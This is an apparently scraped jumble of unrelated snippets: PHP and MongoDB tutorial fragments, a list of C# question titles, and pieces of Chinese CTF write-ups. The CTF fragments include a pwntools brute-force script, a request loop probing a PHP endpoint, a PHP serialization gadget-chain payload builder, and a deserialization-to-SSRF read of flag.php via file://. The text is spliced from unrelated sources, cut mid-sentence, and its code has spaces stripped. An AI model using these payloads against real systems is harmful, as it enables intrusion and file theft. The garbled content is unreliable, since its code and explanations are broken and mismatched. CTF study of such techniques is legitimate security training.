To get the PHP version and configuration information, use thephpinfo()function. Thephpinfo()function is used to get details on PHP configuration, including information about the PHP version, server information, extensions, and more. It accepts parameters if you want to display specific info...
Passing in a string value for Write Concern has a specific meaning (Replica Set Tag Set Acknowledged). Please be careful ofNOTusing string values for numbers (i.e.array("w" => "1")) as it will be treated as a tag set name. Majority Acknowledged Writes Using the specialmajorityWrite C...
php$user=array("name"=>"Nathan","age"=>"29","skills"=>array("JavaScript","PHP","Python"));file_put_contents("output.txt",var_export($user,true)); Thevar_export()function will print the array in a slightly different format as shown below: array ('name' => 'Nathan','age' => ...
} In order to change an inner field, we use $set (so that all of the other fields are not removed!) with the index of comment to change: <?php $blog->update($criteria, array('$set'=> array("comments.1"=> array("author"=>"Jim"))); ?> The Positional Operator The positional ...
Tip:len(array)=5&&len(passwd)=114 得知有5个字符,passwd长度为114,直接爆破+手搓 #coding=utf-8importosimportsysimporttimefrompwnimport*fromctypesimport*fromtqdmimport*# context.log_level='debug'# context.arch='amd64'#p=process('./pwn')p=remote('',35308)s=lambdadata:p.send(...
2D Array read from Text file 2D array to CSV C# steamwriter 3 dimensional list in C# 32 bit app - how to get 'C:\program files" directory using "Environment.GetFolderPath" 32 bit Application calling 32 bit DLL "An attempt was made to load a program with an incorrect format. (Exceptio...
构造payload:?a=0&b=3、/substr_pass.php?a=0&b=3 发现回显pas感觉快出来了,通过使用脚本来进行循环请求 importrequestsforiinrange(0,100):url=f'{i}&b=3'txt=requests.get(url).textprint(txt)if'hacker'notintxt:print(txt[0]) ...
<?phpclass Joker{ private $Error; public function __construct(){ $this->Error = new Bigger(); $this->Error->Processing_strings = new Lisa(); }}class Bigger{ public $Processing_strings;}class Lisa{ public $code;}$a = new Joker;echo base64_encode(serialize($a));?> ...
很简单的一道题,反序列化然后通过ssrf漏洞直接读取flag.php文件<?php class client{ public payload; } a->url = "file:///var/www/html/flag.php"; echo serialize(<?php error_reporting(0); include "flag.php"; highlight_file(__FILE__); " />allowed_ip = ""; if (allowed_ip)...
view-source:'cat flag.php'); 这个解法已经烂大街了,就不具体分析了~ web_checkin2 题目修正了之前的非预期,修改了flag名字: //PHP 7.0.33 Apache/2.4.25 ...